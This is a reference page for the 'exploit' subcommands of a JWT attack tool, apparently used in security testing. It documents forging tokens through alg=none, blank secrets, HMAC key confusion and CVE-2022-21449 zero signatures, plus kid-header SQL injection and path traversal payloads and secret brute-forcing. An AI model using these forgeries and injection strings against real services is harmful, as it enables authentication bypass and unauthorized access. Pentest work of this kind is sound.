exploit
Apply a JWT security exploit to an existing token and print the modified token to stdout. Each subcommand implements one exploit independently.
jwtop exploit <subcommand> <token> [flags]Subcommands
Section titled “Subcommands”| Subcommand | Description |
|---|---|
algnone | Set alg=none and strip the signature |
blanksecret | Re-sign with an empty HMAC secret |
nullsig | Strip the signature while keeping the original alg |
hmacconfusion | Re-sign with a public key as HMAC secret (RS/ES → HS) |
psychicsig | Re-sign with an all-zero ECDSA signature (r=0, s=0) |
kidinjection | Inject a value into the kid header |
weaksecret | Brute-force the HMAC signing secret |
algnone
Section titled “algnone”Set alg=none and strip the signature. Use --all to emit one token per capitalisation variant (none, NONE, None, nOnE) to cover libraries that perform case-insensitive algorithm matching.
jwtop exploit algnone <token>jwtop exploit algnone --all <token>| Flag | Description |
|---|---|
--all | Print one token per capitalisation variant of "none" |
blanksecret
Section titled “blanksecret”Re-sign the token with an empty string as the HMAC secret. A server that accepts this token is configured with a blank signing key.
jwtop exploit blanksecret <token>nullsig
Section titled “nullsig”Strip the signature segment while leaving the alg header unchanged. The resulting token has the form header.payload. (trailing dot, empty signature).
jwtop exploit nullsig <token>hmacconfusion
Section titled “hmacconfusion”Re-sign an RSA or ECDSA token as its HMAC equivalent, using the server’s public key PEM as the HMAC secret. Exploits servers that verify HS256 tokens using their RSA/EC public key.
Algorithm mapping (same bit-strength):
| Original | Exploited |
|---|---|
RS256 / ES256 / PS256 | HS256 |
RS384 / ES384 / PS384 | HS384 |
RS512 / ES512 / PS512 | HS512 |
jwtop exploit hmacconfusion <token> --key <pem-file-or-url>| Flag | Description |
|---|---|
--key | Path or URL to a PEM public key file (required) |
psychicsig
Section titled “psychicsig”Re-sign an ECDSA token (ES256, ES384, or ES512) with an all-zero r=0, s=0 signature, sized for the token’s declared algorithm. Exploits CVE-2022-21449 (“psychic signatures in Java”), where some ECDSA verifiers (notably Java 15-18’s SunEC provider) failed to reject r=0/s=0, accepting the token as validly signed for any message and any public key.
jwtop exploit psychicsig <token>kidinjection
Section titled “kidinjection”Manipulate the kid header field and re-sign the token.
jwtop exploit kidinjection <token> [--mode <mode>] [--kid <value>] [--secret <secret>]| Flag | Description |
|---|---|
--mode | sql, path, or raw (default sql) |
--kid | Override the kid value (overrides the mode default) |
--sql-table | Table name for sql mode payload (default tokens) |
--path | File path for path mode payload (default /dev/null) |
--secret | HMAC secret to sign with (overrides the mode default) |
Modes:
| Mode | Default kid | Default secret | Description |
|---|---|---|---|
sql | ' UNION SELECT 'secret' FROM <table> WHERE '1'='1 | secret | SQL injection — makes a SELECT return an attacker-controlled value |
path | /dev/null | (empty) | Path traversal to an empty file |
raw | (required via --kid) | (empty) | Arbitrary value |
Examples:
# SQL injection (default table: tokens)jwtop exploit kidinjection --mode sql $TOKEN
# SQL injection targeting a custom tablejwtop exploit kidinjection --mode sql --sql-table keys $TOKEN
# Path traversal (default path: /dev/null)jwtop exploit kidinjection --mode path $TOKEN
# Path traversal with a custom pathjwtop exploit kidinjection --mode path --path /proc/sys/kernel/ns_last_pid $TOKEN
# Arbitrary kid valuejwtop exploit kidinjection --mode raw --kid "../../etc/passwd" --secret "" $TOKENweaksecret
Section titled “weaksecret”Dictionary-attack the HMAC signing secret of an HS256/HS384/HS512 token. The built-in wordlist is tried first, then any --wordlist file, then any explicit --secret values.
jwtop exploit weaksecret <token> [--wordlist <file>] [--secret <s>...] [--workers <n>]| Flag | Description |
|---|---|
--wordlist | Path to a newline-delimited file of candidate secrets |
--secret | Explicit candidate secret (repeatable) |
--workers | Number of concurrent workers (default 8) |
Examples:
# Use the built-in dictionaryjwtop exploit weaksecret $TOKEN
# Add explicit guesses on top of the built-in dictionaryjwtop exploit weaksecret $TOKEN --secret mysecret --secret topsecret
# Use a custom wordlistjwtop exploit weaksecret $TOKEN --wordlist /path/to/secrets.txtPrints the recovered secret to stdout (exit 0) when found; exits 1 when not found.